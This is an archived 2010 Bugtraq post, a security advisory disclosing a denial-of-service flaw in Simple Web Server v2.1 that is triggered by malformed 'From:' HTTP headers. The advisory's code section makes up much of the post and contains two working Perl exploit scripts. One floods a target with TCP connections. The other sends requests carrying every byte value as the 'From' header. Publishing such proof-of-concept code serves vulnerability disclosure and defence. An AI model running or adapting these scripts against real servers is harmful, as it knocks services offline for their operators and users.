lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <AANLkTikwrcNzVycReymdZ6FQRi6j1pQWNiwftKWvykQ=@mail.gmail.com>
Date: Mon, 2 Aug 2010 13:49:35 -0700
From: Rodrigo Escobar <ipax@...abs.com.br>
To: bugtraq@...urityfocus.com
Subject: [DCA-0003] Simple Web Server DoS

[DCA-0003]

[Software]

 - Simple Web Server

[Vendor Product Description]

 - The easy and small way to open an HTTP Web Server. OS
Versions:Windows9x/Me/NT/2000/XP

[Bug Description]

 - SwS can't handle the header 'From:' when using random ASCII
characters leading to Denial-of-Service.

[History]

 - Advisory sent to vendor on 06/14/2010.
 - No response from vendor
 - Public advisory & exploit 08/02/2010.

[Impact]

 - Low

[Affected Version]

 - Simple Web Server SwS v2.1
 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;


        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        $conn   = $ARGV[2];

        $num    = 0;


        while ( $num <= $conn ) {
                system("echo -n .");
                $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

        close($s);
        $num++;
        }


#!/usr/bin/perl
use Net::HTTP;

        if (@ARGV < 1) {
                usage();
        }


	$host = @ARGV[0];
	$port = @ARGV[1];
	$num  = 0;

        print "[+] Sending request...\n";


	while ($num <= 255) {
		my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@;
		$s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0",
					      'From' => chr($num));

		$num++;
		close($s);
	}

	print "\n[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}



[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br


[Greetz]
Crash and all Dclabs members.

-- 
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ